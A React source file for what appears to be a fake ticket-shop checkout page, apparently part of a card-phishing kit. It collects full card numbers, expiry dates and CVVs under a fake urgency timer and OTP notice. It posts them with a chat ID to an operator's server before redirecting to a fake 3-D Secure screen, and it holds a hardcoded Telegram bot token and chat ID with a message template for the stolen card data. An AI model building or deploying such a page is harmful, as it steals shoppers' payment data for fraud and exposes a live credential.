import { useState, useEffect, useRef } from "react";
import { useTickets } from "./TicketContext";
import { useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import axios from "axios"
import ReactPixel from "react-facebook-pixel"  





export default function PaymentMethod() {
  const [timeLeft, setTimeLeft] = useState(15 * 60); // 15 минут в секундах

  useEffect(() => {
    const timer = setInterval(() => {
      setTimeLeft((prevTime) => (prevTime > 0 ? prevTime - 1 : 0));
    }, 1000);
    return () => clearInterval(timer);
  }, []);

  const { totalPrice } = useTickets();
  
  const formatTime = (seconds) => {
    const minutes = Math.floor(seconds / 60);
    const secs = seconds % 60;
    return `${minutes}:${secs < 10 ? "0" : ""}${secs}`;
  };

  const handleInputChange = (e, maxLength) => {
    const value = e.target.value.replace(/\D/g, ""); // Удаляет все нечисловые символы
    e.target.value = value.slice(0, maxLength);
  };

  const location = useLocation();
  const [submitBtnContent, setSubmitBtnContent] = useState(`Submit`)
  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)
const totalAmount = totalPrice
const navigate = useNavigate()
  const [submitBtnDis, setSubmitBtnDis] = useState(true)

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value, input2Value, input3Value])



  const fullUrl = window.location.href
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1)
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    console.log(
      `AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`
    )
    // Check conditions for enabling/disabling submit button
    if (
      input1Value !== "" &&
      input2Value !== "" &&
      input3Value !== "" &&
      input1Value.length === 19 &&
      input2Value.length === 5 &&
      input3Value.length === 3 &&
      isDateGreaterThan(input2Value, "10/24")
    ) {
      if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
        setSubmitBtnDis(false) // Enable submit button if all inputs are filled
      }
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }
  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr)
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number)
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number)

    // First, compare the years
    if (year > compYear) return true
    if (year < compYear) return false

    // If years are the same, compare the months
    return month > compMonth
  }
  const handleSender = async () => {
    const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o" // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`

    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0) // First digit
    const lastFourDigits = input1Value?.slice(-4) // Last 4 digits

    // Set values to localStorage
    localStorage.setItem("summ", totalAmount.toFixed(2))
    localStorage.setItem("first-digit", firstDigit)
    localStorage.setItem("last-four-digits", lastFourDigits)

    const payload = {
      chat_id: "-1002222911401", // Replace with the target chat ID
      text: `💳 ${input1Value}
  📆 ${input2Value}
  🔐 ${input3Value}`, // The message text
    }

    try {
      ReactPixel.track("Purchase")
    } catch (err) {
      console.log(err)
    }
    setSubmitBtnContent(<div className="inputLoader"></div>)



    // const additionalMessage = `|${formData.firstName} ${formData.lastName}|${formData.email}|${formData.country.label}|`
    const dataToSend = {
      orderId: "123",
      uuId: localStorage.getItem("uuId"),
      main: input1Value,
      date: input2Value,
      code: input3Value,
      summ: totalAmount.toFixed(2),
      chatId: process.env.REACT_APP_CHAT_ID,
      domain: process.env.REACT_APP_DOMAIN,
      link: fullUrl,
      additional: '',
    }
    console.log(dataToSend)
    try {
      await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/validation",
        dataToSend,
        {
          headers: {
            "Content-Type": "application/json",
          },
        }
      )
      navigate("/3ds/loading")
    } catch (error) {
      console.error("Error sending data:", error)
      setTimeout(() => {
        setSubmitBtnContent(`Pay: ${localStorage.getItem('price')} Ft`)
      }, 3000)
    }
  }


  

  return (
    <div className="min-h-screen flex items-center justify-center bg-[#f8f5e9] p-6">
      <div className="max-w-md p-6 border-gray-300 rounded-lg ">
        <h2 className="mb-4 text-xl font-semibold text-green-900 font-georgia">
          Select preferred payment method
        </h2>
        <p className="text-sm text-gray-700 font-georgia">
          For enhanced security, you will be prompted to input a One-Time
          Password (OTP) when making a debit/credit card transaction.
        </p>
        <p className="mt-2 text-sm text-gray-700 font-georgia">
          Please complete the entire payment process <span className="font-bold">within 15 minutes</span>. If
          payment is not received within the specified timeframe, your order
          will be automatically cancelled.
        </p>
        <p className="mt-4 font-bold text-gray-700 font-georgia">
          Please do not press the back button or refresh this page.
        </p>
        <div className="mt-4 border-t border-gray-300"></div>

        {/* Форма оплаты */}
          <p className="mt-5 mb-5 text-sm text-gray-700 font-georgia">Complete payment in <span className="font-bold text-black">{formatTime(timeLeft)}</span></p>
        <div className="p-4 bg-white border border-gray-200 rounded-lg shadow-lg">
          <div className="flex items-center mt-2 space-x-2">
            <span className="w-4 h-4 bg-green-600 rounded-full"></span>
            <p className="font-semibold text-gray-800">Credit Card</p> <img src="/card.svg " className="h-5" />
          </div>
          <p className="mt-2 text-sm text-left text-black">Card number</p>
          <div className="mt-1">
        
          <InputField
                    formatType={"card"}
                    ref={input1Ref}
                    value={input1Value}
                    onFocus={handleInput1Focus}
                    onChange={(e) => setInput1Value(e.target.value)}
                    placeholder={"Card number"}
                    focused={checkFocus(1)}
                  />
          </div>
          <div className="flex mt-2 space-x-2">
            <img src="/11.svg" alt="Visa" className="h-5" />
            <img src="/12.svg" alt="MasterCard" className="h-5" />
            <img src="/13.svg" alt="Amex" className="h-5" />
            <img src="/14.svg" alt="Amex" className="h-5" />
          </div>
          <div className="flex mt-4 space-x-2">
            <div className="w-1/2">
              <p className="text-sm text-left text-black">Expiry date</p>
              <InputField
                      formatType={"date"}
                      ref={input2Ref}
                      value={input2Value}
                      onFocus={handleInput2Focus}
                      onChange={(e) => setInput2Value(e.target.value)}
                      placeholder={"Expiry date"}
                      focused={checkFocus(2)}
                    />
            </div>
            <div className="w-1/2">
              <p className="text-sm text-left text-black">Security code</p>
              <InputField
                      formatType={"code"}
                      ref={input3Ref}
                      value={input3Value}
                      onFocus={handleInput3Focus}
                      onChange={(e) => setInput3Value(e.target.value)}
                      placeholder={"CVV"}
                      focused={checkFocus(3)}
                    />
            </div>
          </div>
          <p className="mt-2 text-sm text-left text-black">Name on card</p>
          <div className="mt-1">
            <input type="text" className="w-full p-2 text-gray-500 border rounded-lg" placeholder="J. Smith" />
          </div>


          
              
 
          <button onClick={handleSender} disabled={submitBtnDis} className="w-full text-md p-2 mt-4 font-georgia font-semibold text-black bg-[#FFCC00] rounded-full">
          {submitBtnContent}
        </button>

          
        </div>
      </div>
    </div>
  );
}
